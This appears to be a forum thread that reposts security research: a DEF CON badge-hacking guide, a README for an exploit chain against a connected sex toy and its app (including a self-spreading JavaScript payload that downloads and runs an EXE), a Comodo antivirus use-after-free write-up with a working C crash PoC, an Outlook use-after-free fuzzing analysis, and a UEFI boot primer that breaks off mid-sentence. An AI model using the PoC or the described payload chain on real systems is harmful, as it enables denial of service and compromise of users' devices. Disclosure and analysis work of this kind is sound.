If you hear a normal startup beep, the lights flash, and then it goes back to the startup beep, and so on, forever, something is causing the MCU to keep resetting. Could be a short or ESD damage. Check soldering. Connect your board to a serial terminal and see how far it gets in the boot process to help narrow down the cause.
Sometimes the flags don't get saved properly. A power cycle usually works, and you could also try reflashing the badge.

If your badge isn't responding to other badges with the NFMI, it could be one of two things:

Your copper antenna (see photo at top of post) is loose/broken/missing. This happened a lot. Solder it back on.
If missing, it's a Sunlord MTNF6040FS3R7JTFY01 but it's not available online anywhere at the moment. Datasheet is here. See this reply for more details on possible alternatives.
If you were previously in interactive serial port mode, you have to explicitly exit it with Ctrl+X to receive packets again.

Further hacking:

For basic hacking of the code, try changing your game flags to trick it into giving you a fully unlocked badge. From there, you could try to make your own chameleon badge like others have done (https://github.com/japd06/defcon27_badge and https://github.com/nkaminski/DC27-badge-CFW and https://github.com/NickEngmann/Jackp0t among others if you want ideas). Or make your own songs with the piezo. Or some ASCII art on the terminal.

For more advanced hacking on the badge, PTE22 and PTE23, the TX and RX pins on the serial header, could be programmed to be ADC input pins instead. Or timer inputs or outputs for PWM or input capture.

Pin Mux

And if you're good at soldering, you could even add an additional I2C device by soldering to the resistor points.

I2C points

Finally, if you want a more flexible platform for exploring embedded development, you can pick up a FRDM-KL27Z dev kit for $20 which has the same chip as the badge. You can buy it direct or from all major distributors online. The programmer and serial interface are built into the board so you only need to use a USB cable to do all the programming. The KL27 SDK also includes dozens of example programs that show how to use all the features of the chip and there's some getting started videos (mostly what I covered already in this post though). While it does not have an NFMI chip on it, it does have USB support, as well as an Arduino hardware footprint on it so it can be easily expanded with extra boards. You can find the example programs by going to "Import SDK examples" from the Quickstart panel window. Hope this helps some beginner embedded hackers, and if you have any questions let me know.
Hope to see yall next year! Sursa: https://www.reddit.com/r/Defcon/comments/cpmpja/defcon_27_badge_hacking_for_beginners/
  19. Abusing Insecure WCF Endpoints for Fun and Profit - Christopher Anastasio - INFILTRATE 2019
  20. Nytro

    butthax

This repository contains code for an exploit chain targeting the Lovense Hush connected buttplug and associated software. This includes fully functional exploit code for a Nordic Semiconductor BLE stack vulnerability affecting all versions of SoftDevices s110, s120 and s130, as well as versions of the s132 SoftDevice 2.0 and under. Exploit details can be found in the slides for the associated DEF CON 27 talk, Adventures in smart buttplug penetration (testing).

How to build

I don't really expect anyone to actually build this, but if for some reason you do, follow these steps:

1. Get armips (I used version 0.10.0) and have it in your PATH
2. Install devkitARM
3. Get the buttplug's SoftDevice from Nordic (s132_nrf52_1.0.0-3.alpha_softdevice.hex) and place it in the inputbin directory (or dump it from your own plug)
4. Dump your buttplug's application firmware through SWD (for example with j-link command "savebin hushfw.bin, 1f000, 4B30") and place it as hushfw.bin in the inputbin directory
5. Run build.bat - it should generate exploitfw.zip. You can then use the Nordic Toolbox app to enable DFU mode on the target buttplug using the "DFU;" serial command and then flash the custom firmware you just built through the app's DFU functionality

NOTE: if anything goes wrong building this you could totally end up bricking your toy, or worse. So please be sure to 100% know what you're doing and don't blame me if it does mess up.
Files

- fwmod: malicious firmware for the Hush
  - firmwaremod.s: edits the firmware to (a) install hooks into the softdevice that will allow us to intercept raw incoming/outgoing BLE packets and (b) send our own raw BLE packets
  - exploit/source/main.c: C implementation of the Nordic SoftDevice BLE vulnerability exploit
  - exploit/source/payload.c: binary payload to be sent to and run by the victim USB dongle
- inputbin: input binaries that i don't want to redistribute because i didn't make them and don't want to get in trouble (BYOB)
- js/t.js: JavaScript payload to run in the Lovense Remote app - downloads an EXE file, runs it, and then forwards the payload to everyone in the user's friend list
- s132_1003a_mod: modifications to the 1.0.0.3alpha version of the s132 SoftDevice (which is what the Hush ships with) which allow our modded firmware to interact with the BLE stack - must be built before fwmod
- scripts: various python scripts to help build this crap
- shellcode: a few assembly files for tiny code snippets used around the exploit chain - doesn't need to be built as they're already embedded in other places, only provided for reference
- flash.s: source for fwmod/exploit/source/payload.c, i.e. the payload that runs on the victim USB dongle - contains code to generate the HTML/JavaScript payload, flash it to the dongle for persistence, and then send it over to the app

Contact

You can follow me on twitter @smealum or email me at smealum@gmail.com.

Disclaimer

don't be a dick, please don't actually try to use any of this

Sursa: https://github.com/smealum/butthax/blob/master/README.md
  21. Tuesday, August 13, 2019 Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694) Hello, In this blogpost I'm going to share an analysis of a recent finding in yet another Antivirus, this time in Comodo AV. After reading this awesome research by Tenable, I decided to give it a look myself and play a bit with the sandbox. I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I have found the vulnerability quite interesting and worthy of a write-up. Comodo's sandbox filters file I/O allowing contained processes to read from the volume normally but redirects all writes to '\VTRoot\HarddiskVolume#\' located at the root of the volume on which Windows is installed. For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure where multiple fields are initialized. The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C. (Figure 1) Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context. Keep in mind that a stream handle context is unique per file object (user-mode handle). (Figure 2) The only minifilter callback which queues IRPs to the data queue is present in the IRP_MJ_DIRECTORY_CONTROL preoperation callback for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY. Before the IRP_MJ_DIRECTORY_CONTROL checks the minor function, it first verifies whether a stream handle context is available and whether a data queue is already present within. 
It checks if the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present. (Figure 3) Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made, of which the pointer is stored in RDI as shown below. (Figure 4) Later on, this structure is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine. (Figure 5) FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized on Figure 1). Examining this routine, we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on. As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context. (Figure 6)

Here is a quick recap of what we saw until now:

1. For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure.
2. A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context.
3. IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY. If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized.
4. The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context.
5. FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context.
6. The insert callback inserts the request into the queue and queues a deferred work item with the same allocation as a context.
It is very simple for a sandboxed user-mode process to make the minifilter take this code path: it only needs to call the API FindFirstChangeNotificationA on an arbitrary directory. Let's carry on. So, the work item's context (the non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right? This is accomplished by IRP_MJ_CLEANUP's preoperation routine. As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage. In this instance, the stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so no new requests are queued, and then the queue cleanup is done by "DoCleanup". (Figure 8) As shown below, this sub-routine dequeues the pended requests from the data queue, retrieves the saved context structure in FLT_CALLBACK_DATA, completes the operation, and then goes on to free the context. (Figure 9) We can trigger what we've seen until now from a contained process by:

Calling FindFirstChangeNotificationA on an arbitrary directory, e.g. "C:\": sends IRP_MJ_DIRECTORY_CONTROL and causes the delayed work item to be queued.
Closing the handle: sends IRP_MJ_CLEANUP.

What can go wrong here? The answer is freeing the context before the delayed work item is dispatched, which would eventually hand the work item a freed context that it then uses (use-after-free). In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the delayed work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution. When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense in my opinion since the work item queue doesn't contain many items and dispatching a work item takes less time than all the work the subsequent call to CloseHandle does.
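Before looking at the actual PoC, the ordering requirement can be illustrated with a small, deterministic Python model. This is entirely my own illustration (the event names are invented; nothing here is taken from cmdguard.sys): a use-after-free only occurs when the cleanup-time free lands between queuing and dispatching of the deferred work item.

```python
# Model: IRP_MJ_DIRECTORY_CONTROL queues a work item holding a pointer to a
# context allocation; IRP_MJ_CLEANUP frees that context. If the free happens
# before the work item is dispatched, the work item runs with dangling memory.

def simulate(events):
    """Replay an event ordering; return True if a use-after-free occurred."""
    work_queue = []   # pending deferred work items (context ids)
    freed = set()     # contexts released by the IRP_MJ_CLEANUP path
    uaf = False
    for op, ctx in events:
        if op == "queue":        # IRP_MJ_DIRECTORY_CONTROL queues the work item
            work_queue.append(ctx)
        elif op == "cleanup":    # IRP_MJ_CLEANUP frees the context
            freed.add(ctx)
        elif op == "dispatch":   # system thread finally runs the work item
            work_queue.remove(ctx)
            if ctx in freed:     # context already freed -> use-after-free
                uaf = True
    return uaf

# Single-threaded ordering observed in the post: dispatch beats cleanup. Safe.
safe = simulate([("queue", 1), ("dispatch", 1), ("cleanup", 1)])
# Saturated-queue ordering: cleanup lands before the deferred dispatch. UAF.
crash = simulate([("queue", 1), ("cleanup", 1), ("dispatch", 1)])
print(safe, crash)  # False True
```

The multi-threaded PoC simply makes the second ordering likely by keeping the work item queue full.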
So the idea here was to create multiple threads that infinitely call CloseHandle(FindFirstChangeNotificationA(..)) to saturate the work item queue as much as possible and delay the dispatching of work items until the contexts are freed. A crash occurs once a work item accesses a freed context's pool allocation that was corrupted by some new allocation. Below is the proof of concept to reproduce the vulnerability:

#include <Windows.h>

#define NTHREADS 5

DWORD WINAPI Thread(LPVOID Parameter)
{
    while (1)
        CloseHandle(FindFirstChangeNotificationA("C:\\", FALSE, FILE_NOTIFY_CHANGE_FILE_NAME));
}

void main()
{
    HANDLE hLastThread;
    for (int i = 0; i < NTHREADS; i++)
        hLastThread = CreateThread(NULL, 0, Thread, NULL, 0, 0);
    WaitForSingleObject(hLastThread, INFINITE);
}

And here is a small WinDbg trace to see what happens in practice (inside parentheses is the address of the context):

1. [...]
   QueueWorkItem(fffffa8062dc6f20)
   DeferredWorkItem(fffffa8062dc6f20)
   ExFreePoolWithTag(fffffa8062dc6f20)
   [...]
2. QueueWorkItem(fffffa80635d2ea0)
   ExFreePoolWithTag(fffffa80635d2ea0)
   QueueWorkItem(fffffa8062dd5c10)
   ExFreePoolWithTag(fffffa8062dd5c10)
   QueueWorkItem(fffffa8062dd6890)
   ExFreePoolWithTag(fffffa8062dd6890)
   QueueWorkItem(fffffa8062ddac80)
   ExFreePoolWithTag(fffffa8062ddac80)
   QueueWorkItem(fffffa80624cd5e0)
   [...]
3. DeferredWorkItem(fffffa80635d2ea0)

In (1.) everything is normal: the work item is queued, dispatched, and then the pool allocation it uses is freed. In (2.) things start going wrong: the work items are queued, but before they are dispatched the contexts are freed. In (3.) the deferred work item is dispatched with freed and corrupted memory in its context, causing an access violation and thus a BSOD.
We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object: (Figure 10) Reproducing the bug, you will encounter an access violation at this part of the code: (Figure 11) As we can see, it expects multiple pointers to be valid, including a resource pointer, which makes exploitation non-trivial. That's all for this article, until next time.

Follow me on Twitter : here

Posted by Souhail Hammou at 5:14 PM

Sursa: http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
  22. Use-After-Free (UAF) Vulnerability CVE-2019-1199 in Microsoft Outlook

RJ McDown August 14, 2019

Overview

R.J. McDown (@BeetleChunks) of the Lares® Research and Development Team discovered a Critical Remote Code Execution vulnerability in the latest version of Microsoft Outlook. R.J. and the Lares R&D team immediately submitted a report to Microsoft detailing this issue. The vulnerability, now designated CVE-2019-1199, was validated against Microsoft Outlook Slow Ring Build Version 1902 (OS Build 11328.20146) running on Windows 10 Enterprise Version 1809 (OS Build 17763.379). The vulnerability was discovered using a custom fuzzer that was created to target specific segments of an email message with malformed compressed RTF data. After a few iterations, team members noted several crashes resulting from the mishandling of objects in memory. After conducting root cause analysis, it was verified that these crashes were the result of a Use-After-Free condition. Triggering the vulnerability required very little user interaction, as simply navigating out of the Outlook preview pane was enough to trigger the bug, causing Outlook to immediately crash. The following GIF depicts the bug being successfully triggered.

Discovery

One of the message formats supported by Outlook is the .MSG format, which conforms to the Microsoft Object Linking and Embedding (OLE) Data Structures standard format (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f). The OLE structure is similar to a FAT filesystem and can be easily explored with OffVis. After exploring the MSG format and examining the MS-OLEDS documentation, several structures within the file format were identified as good candidates for fuzzing.
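To make the targeted approach concrete, here is a rough sketch of what such a stream-level mutator could look like. This is my own illustration, not Lares' fuzzer (their fuzz_message_part snippet is not reproduced in this mirror): the mutate() byte-flipper stands in for their Radamsa wrapper, and the stream name is hypothetical; olefile's read API is real.

```python
import random

def mutate(data: bytes, seed: int, rate: float = 0.01) -> bytes:
    """Toy stand-in for a Radamsa wrapper: deterministically flip ~rate of the bytes."""
    rng = random.Random(seed)
    out = bytearray(data)
    for i in range(len(out)):
        if rng.random() < rate:
            out[i] = rng.randrange(256)
    return bytes(out)

def make_testcase(template_path: str, stream_name: str, seed: int) -> bytes:
    """Read one property stream from a template .MSG (an OLE compound file)
    and return a mutated copy of it to be written into a test case."""
    import olefile  # pip install olefile; imported lazily
    ole = olefile.OleFileIO(template_path)
    try:
        data = ole.openstream(stream_name).read()
    finally:
        ole.close()
    # olefile can also rewrite a same-size stream in place
    # (OleFileIO(path, write_mode=True) plus write_stream) to emit the test case.
    return mutate(data, seed)
```

Because mutate() is seeded, any crashing test case can be regenerated exactly from its template and seed.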
Test cases were generated using a Python script that leveraged the OLEFILE library to read a template MSG file, extracted specific properties, ran the data through a custom Radamsa Python wrapper, and then wrote the fuzzed test case to disk. The following code snippet shows the function (fuzz_message_part) that was responsible for the creation of each test case. The above code snippet provides a list of message properties in “props_to_fuzz” that are then passed to the “fuzz_message_part()” function. In that function the properties are resolved to locations in the MSG template. The data is then extracted from those locations and run through Radamsa to create a new testcase. The “resolve_property_name()” function simply correlates a property type to a regular expression that will match on the target property. This is shown in the following code snippet. Although Radamsa is a testcase generator in and of itself, using a more targeted fuzzing method, in our experience, has reduced yield time to results. The testcase generator was then integrated into SkyLined’s amazing BugID, and a custom notification system was created that reported all new crash data and classification to the team’s Slack channel. After creation of the fuzzing framework was completed, the team noticed crashes occurring after only a few iterations. Root Cause Analysis After a few interesting crashes were observed, team members used WinDbg as the primary debugger to begin conducting root cause analysis. WinDbg was attached to Outlook, and the test case was opened in Outlook resulting in an immediate access violation. 
After selecting the test case, the Outlook Preview Pane invoked parsing of the message body, resulting in the following exception (Image Base: 7ff7c0d00000):

outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100 -> 7ff7c0e3cc24
outlook+0x80850: 7ff7c0d80850 -> 7ff7c0d80e85
outlook+0x81ce0: 7ff7c0d81ce0 -> 7ff7c139a2ab
outlook!HrShowPubCalWizard+0x101b0c: 7ff7c1afe05c -> 7ff7c1afe0d1
outlook!HrShowPubCalWizard+0x101198: 7ff7c1afd6e8 -> 7ff7c1afd7af
outlook!FOutlookIsBooting+0x4620: 7ff7c0e41920 -> 7ff7c0e41b04
outlook!FOutlookIsResuming+0x38200: 7ff7c1021f00 -> 7ff7c1021f68
outlook!FOutlookIsResuming+0x1f6a0: 7ff7c10093a0 -> 7ff7c100942c
outlook+0xafb04: 7ff7c0dafb04 -> 7ff7c0dafb16
outlook!HrGetOABURL+0x77938: 7ff7c1110598 -> 7ff7c1110613
VCRUNTIME140!_CxxThrowException

Next, a breakpoint was set on "outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100" and execution of Outlook was continued. While Outlook was running, another component within the Outlook GUI, such as an email message, folder, button, etc., was selected. After doing so, another application exception occurred while attempting to execute an address that referenced unmapped memory.

outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100
outlook+0x80850: 7ff7c0d80850
outlook+0x81ce0: 7ff7c0d81ce0
outlook+0x7419e: 7ff7c0d7419e -> crash occurs (test byte ptr [rcx],1 ds:0000020b`00a76ffc=??)

WinDbg's heap function was used to analyze the address pointed to by the instruction pointer at the time of the second exception. This showed that the application crashed while attempting to reference data in a heap block that was in a freed state, which confirmed the presence of a Use After Free (UAF) condition.
0:000> !heap -p -a 20b00a76ffc
address 0000020b00a76ffc found in
_DPH_HEAP_ROOT @ 20b17571000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
                             20b0003c820: 20b00a76000 2000
00007ff9e51b7608 ntdll!RtlDebugFreeHeap+0x000000000000003c
00007ff9e515dd5e ntdll!RtlpFreeHeap+0x000000000009975e
00007ff9e50c286e ntdll!RtlFreeHeap+0x00000000000003ee
00007ff9ad247f23 mso20win32client!Ordinal668+0x0000000000000363
00007ff9ad1a2905 mso20win32client!Ordinal1110+0x0000000000000065
00007ff7c0d74a55 outlook+0x0000000000074a55
00007ff7c0d7449f outlook+0x000000000007449f
00007ff7c0dbe227 outlook+0x00000000000be227
00007ff7c0dbcdaf outlook+0x00000000000bcdaf
00007ff7c0dbb9e0 outlook+0x00000000000bb9e0
00007ff7c12db320 outlook!HrGetCacheSetupProgressObject+0x0000000000008740
00007ff7c0da75e7 outlook+0x00000000000a75e7
00007ff7c0da7373 outlook+0x00000000000a7373
00007ff7c0eaae24 outlook!RefreshOutlookETWLoggingState+0x0000000000023694
00007ff7c0eaa525 outlook!RefreshOutlookETWLoggingState+0x0000000000022d95
00007ff7c0d6d946 outlook+0x000000000006d946
00007ff7c0d6d2d4 outlook+0x000000000006d2d4
00007ff9e2d5ca66 USER32!UserCallWinProcCheckWow+0x0000000000000266
00007ff9e2d5c34b USER32!CallWindowProcW+0x000000000000008b
00007ff9d55ab0da Comctl32!CallNextSubclassProc+0x000000000000009a
00007ff9d55aade8 Comctl32!TTSubclassProc+0x00000000000000b8
00007ff9d55ab0da Comctl32!CallNextSubclassProc+0x000000000000009a
00007ff9d55aaef2 Comctl32!MasterSubclassProc+0x00000000000000a2
00007ff9e2d5ca66 USER32!UserCallWinProcCheckWow+0x0000000000000266
00007ff9e2d5c582 USER32!DispatchMessageWorker+0x00000000000001b2
00007ff7c0dd9a10 outlook+0x00000000000d9a10
00007ff7c1051b85 outlook!IsOutlookOutsideWinMain+0x0000000000005545
00007ff7c0f104e7 outlook!HrBgScheduleRepairApp+0x000000000004a4d7
00007ff7c105b646 outlook!OlkGetResourceHandle+0x00000000000045d6
00007ff9e4b981f4 KERNEL32!BaseThreadInitThunk+0x0000000000000014
00007ff9e511a251 ntdll!RtlUserThreadStart+0x0000000000000021

Conclusion
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file. At the time of this publication, Microsoft has not identified any mitigating factors or workarounds for this vulnerability. The only way to fix this issue is to apply the August 2019 Security Update. We encourage you to monitor the Microsoft advisory for any updates: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1199. If your organization would like to confirm if this issue affects your deployed systems, or to ensure that the patch was properly applied, please do not hesitate to contact us at sales@lares.com. We’d be happy to arrange a time to validate our findings within your organization. Sursa: https://www.lares.com/use-after-free-uaf-vulnerability-cve-2019-1199-in-microsoft-outlook/
  23. Understanding modern UEFI-based platform boot To many, the (UEFI-based) boot process is like voodoo; interesting in that it's something that most of us use extensively but is - in a technical-understanding sense - generally avoided by all but those that work in this space. In this article, I hope to present a technical overview of how modern PCs boot using UEFI (Unified Extensible Firmware Interface). I won't be mentioning every detail - honestly my knowledge in this space isn't fully comprehensive (and hence the impetus for this article-as-a-primer). Also, I can be taken to task for being loose with some terminology but the general idea is that by the end of this long read, hopefully both the reader - and myself - will be able to make some sense of it all and have more than just a vague inkling about what on earth is going on in those precious seconds before the OS comes up. This work is based on a combination of info gleaned from my own daily work as a security researcher/engineer at Microsoft, public platform vendor datasheets, UEFI documentation, some fantastic presentations by well-known security researchers + engineers operating in this space, reading source code and black-box research into the firmware on my own machines. Beyond BIOS: Developing with the Unified Extensible Firmware Interface by Vincent Zimmer et al. is a far more comprehensive resource and I'd implore you to stop reading now and go and read that for full edification (I personally paged through to find the bits interesting to me). The only original bit that you'll find below is all the stuff that I get wrong (experts; please feel free to correct me and I'll keep this post alive with errata). The code/data for most of what we're going to be discussing below resides in flash memory (usually SPI NOR). The various components are logically separated into a bunch of sections in flash, UEFI parts are in structures called Firmware Volumes (FVs). 
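To make "Firmware Volume" slightly more concrete without going into the full layout, here is a minimal sketch of recognizing one by its EFI_FIRMWARE_VOLUME_HEADER: a 16-byte ZeroVector, the filesystem GUID, a 64-bit volume length, then the "_FVH" signature at offset 40 (per the Platform Initialization spec). The synthetic header bytes below are made up purely for illustration.

```python
import struct
import uuid

def parse_fv_header(blob):
    """Pull the filesystem GUID and volume length from an FV header blob."""
    fs_guid = uuid.UUID(bytes_le=blob[16:32])     # FileSystemGuid at offset 16
    fv_length, = struct.unpack_from("<Q", blob, 32)  # FvLength at offset 32
    if blob[40:44] != b"_FVH":                    # Signature at offset 40
        raise ValueError("not a firmware volume")
    return fs_guid, fv_length

# Synthetic 1 MiB volume using the well-known FFS2 filesystem GUID.
FFS2 = uuid.UUID("8c8ce578-8a3d-4f1c-9935-896185c32dd3")
hdr = bytes(16) + FFS2.bytes_le + struct.pack("<Q", 0x100000) + b"_FVH"
print(parse_fv_header(hdr))
```

Tools like UEFITool do essentially this (plus the rest of the header and the FFS file parsing) when they carve a flash dump into volumes.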
Going into the exact layout is unnecessary for what we're trying to achieve here (an overview of boot), so I've left it out.

SEC

Genesis 1
1 In the beginning, the firmware was created. 2 And while it was without form, darkness was indeed upon the face of the deep. And the spirit of the BIOS moved upon the face of the flash memory. 3 And the Power Management Controller said, Let there be light: and there was light. 4 And SEC saw the light, that it was good: and proceeded to boot.

Platform Initialization starts at power-on. The first phase in the process is called the SEC (Security) phase. Before we dive in though, let's back up for a moment.

Pre-UEFI

A number of components of modern computer platform design exist that would be pertinent for us to familiarize ourselves with. Contrary to the belief of some, there are numerous units capable of execution on a modern PC platform (usually presenting with disparate architectures). In days past, there were three main physically separate chips on a classic motherboard - the northbridge (generally responsible for some of the perf-critical work such as the faster comms, memory controller, video), the southbridge (less-perf-critical work such as slower IO, audio, various buses) and, of course, the CPU itself. On modern platforms, the northbridge has been integrated on to the CPU die (IP blocks of which are termed the 'Uncore' by Intel, 'Core' being the main CPU IP blocks), leaving the southbridge; renamed the PCH (Platform Controller Hub) by Intel - something we're just going to refer to as the 'chipset' here (to cover AMD as well). Honestly, exactly which features are on the CPU die and which on the chipset die is somewhat fluid and is prone to change generationally (in SoC-based chips both are present on the same die; 'chiplet' approaches have separate dies but share the same chip substrate, etc.).
Regardless, the pertinent piece of information here is that we have one unit capable of execution - the CPU - that has a set of features, and another unit - the chipset - that has another set of supportive features. The CPU is naturally what we want to get up and running such that we can do some meaningful work, but the chipset plays a role in getting us there - to a smaller or larger extent depending on the platform itself (and Intel + AMD take slightly different approaches here). Let's try to get going again; but this time I'll attempt to lie a little less: after all, SEC is a genesis but not *the* Genesis. That honour - on Intel platforms at least - goes to a component of the chipset (PCH) called the CSME (Converged Security and Manageability Engine). A full review of the CSME is outside the scope of this work (if you're interested, please refer to Yanai Moyal & Shai Hasarfaty's BlackHat USA '19 presentation on the same), but what's relevant to us is its role in the platform boot process. On power-on, the PMC (Power Management Controller) delivers power to the CSME (incidentally, the PMC has a ROM too - software is everywhere nowadays - but we're not going to go down that rabbit hole). The CPU is stuck in reset and no execution is taking place over there. The CSME (which is powered by a tiny i486-like IP block), however, starts executing code from its ROM (which is immutably fused on to the chipset die). This ROM code acts as the Root-of-Trust for the entire platform. Its main purpose is to set up the i486 execution environment, derive platform keys, load the CSME firmware off the SPI flash, verify it (against a fused hash of an Intel public key) and execute it. Skipping a few steps in the initial CSME flow - eventually it gets itself to a state where it can involve itself in the main CPU boot flow (CSME Bringup phase).
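The "verify against a fused hash of a public key" pattern is worth pausing on, since it recurs across vendors: the fuses hold only a digest of the key, the full key ships alongside the (mutable) firmware on flash, and the ROM checks the key against the fuses before trusting any signature made with it. A toy sketch of the pattern — names are made up and the "signature" is a stand-in (a real ROM verifies RSA/ECDSA here):

```python
import hashlib

# The die fuses store only the digest of the vendor public key.
FUSED_KEY_HASH = hashlib.sha256(b"vendor-public-key-material").hexdigest()

def rom_verify(firmware_blob, public_key, signature):
    # 1. Establish trust in the key itself via the fused hash.
    if hashlib.sha256(public_key).hexdigest() != FUSED_KEY_HASH:
        raise ValueError("public key does not match fused hash")
    # 2. Only then use the key to check the firmware. We stand in with a
    #    keyed hash purely for illustration.
    expected = hashlib.sha256(public_key + firmware_blob).hexdigest()
    if signature != expected:
        raise ValueError("bad firmware signature")
    return True
```

Storing only the hash keeps the fuse budget tiny (32 bytes for SHA-256 versus kilobits for an RSA key) while still pinning the key immutably to the die.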
Firstly, the CSME implements an iTPM (integrated TPM) that can be used on platforms that don't have discrete TPM chips (Intel calls this PTT - Platform Trust Technology). While the iTPM capabilities are invoked during the boot process (such as when Measured Boot is enabled), this job isn't unique to the CSME and the existence of a dTPM module would render the CSME's job here moot. More important is the CSME's role in the boot process itself. The level of CSME involvement in the initial stages of host CPU execution depends on what security features are enabled on the platform. In the most straightforward case (no Verified or Measured Boot - modes of Intel's Boot Guard), the CSME simply asks the PMC to bring the host CPU out of reset and boot continues with IBB (Initial Boot Block) execution, as will be expounded on further below. When Boot Guard's Verified Boot mode is enabled, however, a number of steps take place to ensure that the TCB (Trusted Computing Base) can be extended to the UEFI firmware; a fancy way of saying that one component will only agree to execute the next one in the chain after cryptographic verification of that component has taken place (in the case of Verified Boot's enforcement mode; if we're just speaking Measured Boot, the verification takes place and TPM PCRs are extended accordingly, but the platform is allowed to continue to boot).
Let's define some terms (Clark-Wilson integrity policy) because throwing academic terms into anything makes us look smart:

- CDI (Constrained Data Item) - trusted data
- UDI (Unconstrained Data Item) - untrusted data
- TP (Transformation Procedure) - the procedure that will be applied to UDI to turn it into CDI; such as by certifying it with an IVP (Integrity Verification Procedure)

In other words, we take a block of untrusted data (UDI) - which can be code/data/config/whatever - and run it through a procedure (TP) in the trusted code (CDI) such that the untrusted data becomes trusted data; the obvious method of transformation being cryptographic verification. Put more plainly: trusted code verifies untrusted code, and that untrusted code thereby becomes trusted. With that in mind, the basic flow is as follows:

- The CSME starts execution from the reset vector of its ROM code. The ROM is assumed to be CDI from the start and hence is the Root-of-Trust
- The initial parts of the CSME firmware are loaded off the flash into SRAM (UDI), verified by the ROM (now becoming CDI) and executed
- The CPU uCode (microcode) will be loaded. This uCode is considered UDI but is verified by the CPU ROM, which acts as the Root-of-Trust for the CPU
- As Boot Guard is enabled, the uCode will load a component called the ACM (Authenticated Code Module) (UDI) off the flash and will, using the CPU signing key (fused into the CPU), verify it
- The ACM (now CDI) will request the hash of the OEM IBB signing key from the CSME. The CSME is required here as it has access to the FPFs (Field Programmable Fuses) which are burned by the OEM at manufacturing time
- The ACM will load the IBB (UDI) and verify it using the OEM key (the IBB now becoming CDI)

The CPU knows if Boot Guard is enabled by querying the CSME FPFs for the Boot Guard policy. Astute readers will notice that there is a type of 'dual root-of-trust' going on here; rooted in both the CSME and the CPU.
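Mechanically, the bulleted flow above is just repeated application of the same TP: each already-trusted (CDI) stage holds the expected digest of the next untrusted (UDI) stage and only hands over control once verification promotes it. A minimal sketch, with stage names and digests invented for illustration:

```python
import hashlib

def transform(udi_blob, expected_digest):
    """The TP: certify a UDI against a digest held by trusted code."""
    if hashlib.sha256(udi_blob).hexdigest() != expected_digest:
        raise ValueError("verification failed - UDI stays untrusted")
    return udi_blob  # now CDI

ibb = b"OEM initial boot block"
obb = b"OEM boot block"
# The ACM (already CDI) holds/obtains the digest for the IBB; the verified
# IBB in turn holds the digest for the OBB, and so on down the chain.
chain = [(ibb, hashlib.sha256(ibb).hexdigest()),
         (obb, hashlib.sha256(obb).hexdigest())]
for blob, digest in chain:
    transform(blob, digest)
print("boot chain verified")
```

The important property is that a failure at any link stops the chain (in enforcement mode); flip one byte of any stage and the TP refuses to promote it.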
(Note: I've purposefully left out details of how the ACM is discovered on the flash; Firmware Interface Table, etc. as it adds further unnecessary complexity for now. I'll consider fleshing this out in the future.) The CPU now continues to boot by executing the IBB; either unverified (in the no Boot Guard scenario) or verified. We are back at the other Genesis. Hold up for a moment (making forward progress is tough, isn't it??)! Let's speak about Measured Boot here for a short moment. In its simplest configuration, this feature basically means that at every step, each component will be measured into the TPM (such that it can be attested to in the future). When Measured Boot is enabled, there's an interesting point to note: a compromise of the CSME - in its Bringup phase - leads to a compromise of the entire TCB, because an attacker controls the IBB signing keys provided to the CPU ACM. A machine that has a dTPM and doesn't rely on the CSME-implemented iTPM for measurement could still potentially detect this compromise via attestation. Not so when the iTPM is used (as the attacker controlling the CSME potentially controls the iTPM as well). Boot Guard (Measured + Verified Boot), IBB and OBB are Intel terms. In respect of AMD, their HVB (Hardware Validated Boot) covers the boot flow in a similar fashion to 